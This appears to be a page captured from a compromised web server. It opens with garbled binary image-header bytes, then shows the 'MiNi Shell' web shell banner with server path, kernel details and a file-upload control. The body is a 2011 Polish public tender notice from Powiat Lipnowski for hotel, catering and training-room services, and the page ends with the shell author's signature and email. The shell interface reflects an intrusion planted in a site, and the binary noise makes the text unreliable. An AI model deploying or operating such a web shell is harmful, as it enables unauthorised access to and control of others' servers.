JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110406/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110406/107713-N-2011.html

<p class="kh_header"><b>Lipno: Zapewnienie usług hotelowych, gastronomicznych i wynajmu sali z wyposażeniem na potrzeby organizacji szkoleń organizowanych przez Zamawiającego w ramach realizacji projektu Nowoczesne Urzędy- Kompetentne Kadry w Powiecie Lipnowskim.</b><br>
<b>Numer ogłoszenia: 107713 - 2011; data zamieszczenia: 06.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Lipnowski , ul. Sierakowskiego 10B, 87-600 Lipno, woj. kujawsko-pomorskie, tel. 54 2872039, faks 54 2872039.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.lipnowski.powiat.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zapewnienie usług hotelowych, gastronomicznych i wynajmu sali z wyposażeniem na potrzeby organizacji szkoleń organizowanych przez Zamawiającego w ramach realizacji projektu Nowoczesne Urzędy- Kompetentne Kadry w Powiecie Lipnowskim..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest zapewnienie usług hotelowych, gastronomicznych i wynajmu sali z wyposażeniem na potrzeby organizacji szkoleń organizowanych przez Zamawiającego w ramach realizacji projektu  Nowoczesne Urzędy- Kompetentne Kadry w Powiecie Lipnowskim realizowanego w ramach działania 5.2 Wzmocnienie potencjału administracji samorządowej Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.
a.Zakwaterowanie uczestników szkolenia tj. 50 osób w następujących terminach:

Z podziałem na 3 grupy A , B i C
Rok 2011
Sierpień: 11-12,18-19,25-26
Wrzesień: 8-9,15-16,22-23
Październik: 6-7,20-21,27-28
Listopad: 3-4,17-18,24-25
Grudzień: 1-2,5-6, 15-16

Przy czym uczestnicy szkolenia będą podzieleni na trzy grupy A , B  i C /grupa A i B po 17 osób, grupa C -16 osób/. Terminarz szkoleń wg podziału na grupy jest  następujący:

Terminy dla grupy A:					Terminy dla grupy B:
11-12 sierpień 2011 r.					18-19 sierpień 2011 r
8-9 wrzesień 2011 r.					15-16 wrzesień 2011 r.
6-7 październik 2011 r.				20-21 październik 2011 r.
3-4 listopad 2011 r. 					17-18 listopad 2011 r.
1-2 grudzień 2011 r.					5-6 grudzień 2011 r.

Terminy dla grupy C:
25-26 sierpień 2011 r.
22-23 wrzesień 2011 r
27-28 październik 2011 r.
24-25 listopad 2011 r
15-16 grudzień 2011 r.

Wymagane jest więc zapewnienie w w/w terminach następującego asortymentu pokoi z łazienką :
5 pokoi jednoosobowych
7 pokoi dwuosobowych  

Pokoje hotelowe powinny odpowiadać standardowi hotelu co najmniej 3 gwiazdek, w rozumieniu przepisów § 2 ust.2  pkt. 1 rozporządzenia Ministra Gospodarki i Pracy z dnia 19 sierpnia 2004 roku w sprawie obiektów hotelarskich i innych obiektów, w których są świadczone usługi hotelarskie /Dz. U z 2004 roku Nr 188, poz. 1945/ oraz który ma możliwość,  w ramach prowadzonej działalności : serwować gościom całodzienne  wyżywienie, udostępnić sale konferencyjne z pełnym wyposażeniem, posiadać parking dla gości. 
W cenie zakwaterowania należy uwzględnić cenę noclegu w w/w terminach, przy czym zakwaterowanie uczestników ma nastąpić od godz.8:30 pierwszego dnia szkolenia /oddanie do dyspozycji kluczy do pokojów uczestników wg przedłożonej imiennej listy przydziału miejsc w pokojach/ do godz. 12:30 drugiego dnia szkolenia /do tej godziny uczestnicy szkolenia powinni wykwaterować się i zdać klucze od zajmowanych pokoi/. Cena obejmować również powinna kolację dla uczestników szkolenia w formie szwedzkiego stołu z przewidzianym /kącikiem wegetariańskim/, w tym trzy dania ciepłe mięsne i dwa dania ciepłe bezmięsne, dodatki typu frytki, chleb, kluski śląskie , bukiet surówek lub sałatek min. 3 rodzaje,  dwa dania mięsne na zimno , ryby oraz pieczywo białe i ciemne wraz z gorącymi napojami /kawa, herbata wraz z dodatkami typu śmietanka, cytryna, cukier/ oraz napojami zimnymi bezalkoholowymi pierwszego dnia szkolenia od godz. 18:15- 19:00 oraz  śniadanie dla uczestników szkolenia drugiego dnia szkolenia w formie szwedzkiego stołu z przewidzianym /kącikiem wegetariańskim/ w tym min. 4 rodzaje wędlin, trzy rodzaje sera, twarożek, jajecznica, parówki na ciepło, płatki z mlekiem, dżem oraz pieczywo białe, ciemne i bułki  wraz z gorącymi napojami /kawa, herbata wraz z dodatkami typu śmietanka, cytryna, cukier/  od godz. 8:00 do 8:45.
Cena powinna obejmować również udostępnienie uczestnikom szkolenia parkingu dla 10 samochodów.  
b. Catering dla uczestników szkolenia tj. 
- I dnia zagospodarowanie dwóch przerw kawowych : napoje ciepłe /kawa, herbata wraz z dodatkami typu śmietanka, cytryna, cukier + napoje zimne bezalkoholowe/, ciasta w godz. 10:30- 10:45 i 12:15-12:30 i obiad  w formie szwedzkiego stołu  dla uczestników szkolenia z przewidzianym /kącikiem wegetariańskim/ od godz. 14:00- 14:45 w ramach obiadu należy zapewnić: dwa rodzaje zup, dwa dania ciepłe mięsne, dwa dania ciepłe bezmięsne, bukiet surówek /min. 3 surówki w zestawie/ dodatki w postaci ziemniaków, frytek, kopytek, chleba do wyboru oraz deser /ciasto lub lody/ oraz sok . 
- II dnia zagospodarowanie dwóch przerw kawowych : napoje ciepłe /kawa, herbata wraz z dodatkami typu śmietanka, cytryna, cukier + napoje zimne bezalkoholowe/, ciastka lub ciasta w godz. 10:30- 10:45 i 12:15-12:30 i obiad dla uczestników szkolenia  w formie szwedzkiego stołu  z przewidzianym /kącikiem wegetariańskim/ od godz. 14:00- 14:45 w ramach obiadu należy zapewnić: dwa rodzaje zup, dwa dania ciepłe mięsne, dwa dania ciepłe bezmięsne, bukiet surówek /min. 3 surówki w zestawie/ dodatki w postaci ziemniaków, frytek, kopytek, chleba do wyboru oraz deser /ciasto lub lody/ oraz sok,  
c. sala szkoleniowa zapewniająca komfortowe warunki szkolenia na 17 osób + wykładowca z wyposażeniem multimedialnym /klimatyzacja, rzutnik, ekran, flipchard + markery+ bloki do flipcharda, możliwość podłączenia komputera przenośnego, dostęp do Internetu/   na szkolenia w w/w terminach / 5 dwudniowych szkoleń dla trzech grup/, przy czym szkolenia odbywać się będą od 9:00 do godz. 16:15 . 

Każda z zaoferowanych pozycji w ramach usługi gastronomicznej w ramach śniadania, kolacji, obiadu i przerw kawowych ma być dostępna w takiej ilości, by była dostępna dla każdego z uczestników szkolenia.   

W cenę oferty należy wkalkulować koszty udostępnienia nieodpłatnie dla uczestników szkolenia  oferowanych przez Wykonawców atrakcji sprzyjających integracji i wymianie dobrych praktyk wśród uczestników szkolenia, tj.: 
1.Basen
2.Sauna
3.Jakuzi
4.Usługi SPA -min. 30 minut dla każdej z usług świadczonych przez SPA
5.Bilard
6.Wycieczki/zwiedzanie z przewodnikiem 
7.Grill/ognisko
8.Wieczorek taneczny / wieczorek przy muzyce /koncert/
9.Kort tenisowy /z udostępnieniem sprzętu/
10.Boisko do siatkówki, koszykówki, piłki nożnej /z udostępnieniem sprzętu/
11.Przejażdżki bryczką, konno
12.Siłownia
13.Kręgle
14.Darty /rzutki/
15.Karaoke
 W ofercie Wykonawca powinien wymienić  jakie atrakcje zostały wliczone w cenę oferty.
Zamawiający preferuje obiekty położone w odległości od siedziby Zamawiającego /miejscowość Lipno, województwo kujawsko-pomorskie / w przedziale od 25 km do 50 km / włącznie z podanymi wartościami odległości/. Jednocześnie Zamawiający wymaga aby obiekt był położony w miejscowości oddalonej maksymalnie do 70 kilometrów od siedziby Zamawiającego  /miejscowość Lipno, województwo kujawsko-pomorskie /. Liczba kilometrów wskazujących odległość powinna uwzględniać jedynie poruszanie się drogą lądową..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 16.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wypełniony i podpisany przez osoby upoważnione do reprezentacji druk oferty stanowiący załącznik nr 1 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wypełniony i podpisany przez osoby upoważnione do reprezentacji druk oferty stanowiący załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wypełniony i podpisany przez osoby upoważnione do reprezentacji druk oferty stanowiący załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wypełniony i podpisany przez osoby upoważnione do reprezentacji druk oferty stanowiący załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie, jeżeli uprawnienie do reprezentacji Wykonawcy nie wynika z innego przedłożonego dokumentu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Odległość od siedziby Zamawiającego - 20</li>
<li>3 - Zapewnienie uczestnikom szkolenia dodatkowych atrakcji - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.lipnowski.powiat.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lipnie ul. Mickiewicza 58 87-600 Lipno..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.04.2011 godzina 12:00, miejsce: Oferty należy składać w siedzibie Zamawiającego w Starostwie Powiatowym w Lipnie ul. Sierakowskiego 10 B , 87-600 Lipno w sekretariacie do dnia 18.04.2011 r.do godz. 12:00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach realizacji projektu /Nowoczesne Urzędy- Kompetentne Kadry w Powiecie Lipnowskim/ realizowanego w ramach działania 5.2 Wzmocnienie potencjału administracji samorządowej Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com